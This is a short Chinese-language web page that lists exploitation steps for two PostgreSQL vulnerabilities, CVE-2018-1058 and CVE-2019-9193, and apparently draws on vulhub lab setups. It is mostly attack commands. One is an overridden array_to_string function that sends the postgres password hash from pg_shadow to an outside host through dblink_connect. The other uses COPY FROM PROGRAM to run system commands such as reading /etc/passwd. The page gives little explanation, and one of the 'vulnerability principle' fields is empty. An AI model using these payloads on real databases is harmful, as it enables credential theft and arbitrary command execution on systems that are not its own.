当先锋百科网

首页 1 2 3 4 5 6 7

    1.PostgreSQL 提权漏洞(CVE-2018-1058)
        操作技巧:
            psql.exe --host your-ip --username vulhub
            CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
                select dblink_connect((select 'hostaddr=192.168.10.88 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
                SELECT pg_catalog.array_to_string($1,$2);
            $$ LANGUAGE SQL VOLATILE;
        漏洞原理:
        漏洞版本:9.3-10
    2.PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
        操作技巧:
            DROP TABLE IF EXISTS cmd_exec;
            CREATE TABLE cmd_exec(cmd_output text);
            COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';
            SELECT * FROM cmd_exec;
        漏洞原理:
            需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令
        漏洞版本:9.3-11.2